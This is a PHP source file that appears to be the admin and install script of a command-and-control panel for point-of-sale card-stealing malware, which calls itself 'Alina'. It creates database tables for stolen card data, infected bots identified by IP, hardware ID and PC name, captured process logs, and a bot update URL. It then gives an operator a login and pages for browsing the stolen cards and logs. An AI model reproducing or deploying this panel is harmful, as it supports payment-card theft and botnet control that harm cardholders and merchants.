<?php

function error($str)
{
	print '<h1>$str</h1>';
	print '<a href="admin.php">Back</a>';
	exit();
}

function install()
{
	if (@$_GET['do'] !== 'install') {
		print '<h1>New install</h1><form method="POST" action="' . $_SERVER['SCRIPT_NAME'] . '?do=install">'
		. 'Mysql host (or socket): <input type="text" name="host" value="localhost" /><br />'
		. 'Mysql port (leave blank for socket): <input type="text" name="port" value="3306" /><br />'
		. 'Mysql user: <input type="text" name="user" value="root" /><br />'
		. 'Mysql pass: <input type="text" name="pass" value="" /><br />'
		. 'Mysql db (must exist): <input type="text" name="db" value="alina" /><br /><br />'
		. 'Admin password: <input type="text" name="admin" value="" /><br />'
		. '<input type="submit" /></form>';
		exit();
	} else {
		if (isset($_POST['host']) && isset($_POST['port']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['admin']) && isset($_POST['db'])) {
			$host = $_POST['host'] . (empty($_POST['port']) ? : ':' . intval($_POST['port']));
			if (mysql_connect($host, $_POST['user'], $_POST['pass']) === false)
				error('Could not connect to mysql');
			
			if (mysql_select_db($_POST['db']) === false)
				error('Could not select database');
			
			$sql = 'CREATE TABLE IF NOT EXISTS `cards` (
				`id` int(11) NOT NULL AUTO_INCREMENT,
				`ip` varchar(100) NOT NULL,
				`hwid` varchar(100) NOT NULL,
				`pcn` varchar(256) NOT NULL,
				`ua` varchar(256) NOT NULL,
				`date` int(11) NOT NULL,
				`card` text NOT NULL,
				PRIMARY KEY (`id`)
			) ENGINE=MyISAM DEFAULT CHARSET=latin1;';
			
			mysql_query($sql);
			
			$sql = 'CREATE TABLE IF NOT EXISTS `bots` (
				`id` int(11) NOT NULL AUTO_INCREMENT,
				`lastip` varchar(100) NOT NULL,
				`hwid` varchar(100) NOT NULL,
				`pcn` varchar(256) NOT NULL,
				`version` varchar(256) NOT NULL,
				`seen` int(11) NOT NULL,
				PRIMARY KEY (`id`)
			) ENGINE=MyISAM DEFAULT CHARSET=latin1;';
			
			mysql_query($sql);
			if (!mysql_query('TRUNCATE TABLE settings'))
				mysql_query('DELETE FROM settings');
			
			$sql = 'CREATE TABLE IF NOT EXISTS `settings` (
				`id` int(11) NOT NULL AUTO_INCREMENT,
				`skey` varchar(100) NOT NULL,
				`sval` varchar(100) NOT NULL,
				PRIMARY KEY (`id`)
			) ENGINE=MyISAM DEFAULT CHARSET=latin1;';
			
			mysql_query($sql);
			
			if (!mysql_query('TRUNCATE TABLE version'))
				mysql_query('DELETE FROM version');
			
			$sql = 'CREATE TABLE IF NOT EXISTS `version` (
				`id` int(11) NOT NULL AUTO_INCREMENT,
				`ver` varchar(128) NOT NULL,
				`url` varchar(512) NOT NULL,
				PRIMARY KEY (`id`)
			) ENGINE=MyISAM DEFAULT CHARSET=latin1;';
			
			mysql_query($sql);
			
			$pw = md5($_POST['admin']);
			$sql = "INSERT INTO settings(skey, sval) VALUES
				('updateinterval', '120'),
				('cardinterval', '30'),
				('admin', '$pw'),
				('successcode', '666')";
				
			mysql_query($sql);
			
			$sql = 'CREATE TABLE IF NOT EXISTS `logs` (
				`id` int(11) NOT NULL AUTO_INCREMENT,
				`ip` varchar(100) NOT NULL,
				`hwid` varchar(100) NOT NULL,
				`pcn` varchar(256) NOT NULL,
				`ua` varchar(256) NOT NULL,
				`proc` varchar(128) NOT NULL,
				`date` int(11) NOT NULL,
				`data` text NOT NULL,
				PRIMARY KEY (`id`)
			) ENGINE=MyISAM DEFAULT CHARSET=latin1;';
			
			mysql_query($sql);
			
			$config = 
'<?php
//ALINA CONFIG AUTOGENERATED
$host = "' . $host . '";
$user = "' . $_POST['user'] . '";
$pass = "' . $_POST['pass'] . '";
$db = "' . $_POST['db'] . '";

$frontend = array("cards", "logs", "settings", "stats");
$backend = array("c", "d", "l");

if (mysql_connect($host, $user, $pass) === false ||
	mysql_select_db($db) === false)
	die("Cant connect to mysql");

$sql = "SELECT * FROM settings";
$res = mysql_query($sql);
while ($row = mysql_fetch_assoc($res))
	$GLOBALS[$row["skey"]] = $row["sval"];
if (!isset($GLOBALS["admin"]) || empty($GLOBALS["admin"]))
	die("No admin password record found.");
?>';
			
			file_put_contents('config.php', $config);
			header('Location: ' . $_SERVER['SCRIPT_NAME']);
			exit();
		}
	}
}

function auth()
{
	if (isset($_GET['logout'])) {
		setcookie('admin', '');
		
		header('Location: ' . $_SERVER['SCRIPT_NAME']);
		exit();
	}
	
	if (@$_COOKIE['admin'] !== $GLOBALS['admin']) {
		if (isset($_POST['p']) && md5($_POST['p']) === $GLOBALS['admin']) {
			setcookie('admin', $GLOBALS['admin']);
			
			define('AUTHED', true);
			return;
		}
		
		print '<form method="POST" action="' . $_SERVER['SCRIPT_NAME'] . '">'
			. '<input type="password" name="p" /><br /><input type="submit" /></form>';
		
		exit();		
	} else
		define('AUTHED', true);
}

if (!file_exists('config.php'))
	install();
	
require_once 'config.php';


auth();

foreach ($frontend as $f)
	print "<a href='?show=$f'>Show $f</a>&nbsp;&nbsp;";
print "<a href='?logout'>Log Out</a><br /><br />";

if (in_array(@$_GET['show'], $frontend))
	require_once('front/' . @$_GET['show'] . '.php');
else
	require_once('front/cards.php');